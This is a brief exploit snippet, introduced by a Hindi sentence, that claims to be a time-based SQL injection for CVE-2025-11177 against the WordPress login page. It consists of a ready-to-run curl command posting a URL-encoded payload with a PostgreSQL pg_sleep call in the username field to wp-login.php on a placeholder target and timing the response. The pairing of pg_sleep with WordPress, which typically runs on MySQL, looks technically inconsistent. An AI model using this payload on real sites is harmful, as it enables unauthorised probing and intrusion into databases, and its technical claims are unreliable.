
CVE-2025-11177 के लिए टाइम-बेस्ड SQL इंजेक्शन एक्सप्लॉइट जो वर्डप्रेस लॉगिन को लक्ष्यित करता है, जिसमें कर्ल-आधारित पेलोड डिलीवरी और pg_sleep टाइमिंग डिटेक्शन का उपयोग किया गया है।
curl -w '\nTIME:%{time_total}\n' -s \
-d 'log=anything%27%3B%20SELECT%20pg_sleep(5)%3B%20--&pwd=irrelevant&wp-submit=Log+In' \
-d 'redirect_to=' \
-d 'testcookie=1' \
'http://{target}/wp-login.php'